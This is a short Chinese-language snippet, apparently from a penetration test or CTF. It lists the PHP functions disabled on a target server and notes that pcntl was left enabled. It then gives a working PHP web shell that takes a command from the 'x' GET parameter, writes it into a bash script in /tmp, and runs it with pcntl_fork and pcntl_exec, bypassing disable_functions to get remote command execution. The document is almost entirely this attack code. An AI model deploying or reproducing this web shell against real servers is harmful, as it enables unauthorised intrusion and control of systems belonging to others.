大部分被禁用的是这些函数,然而泄露了一个pcntl
被禁用的函数(disable_functions): passthru exec system chroot chgrp
chown shell_exec proc_open proc_get_status popen
ini_alter ini_restore dl openlog syslog
readlink symlink popepassthru stream_socket_server
<?php
header("Content-Type: text/plain");
$cmd="/tmp/exec";
@unlink($cmd);
$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);
$cd="/tmp/output.txt";
print_r(file_get_contents($cd));
switch (pcntl_fork()) {
case 0:
$ret = pcntl_exec($cmd);
exit("case 0");
default:
echo "case 1";
break;
}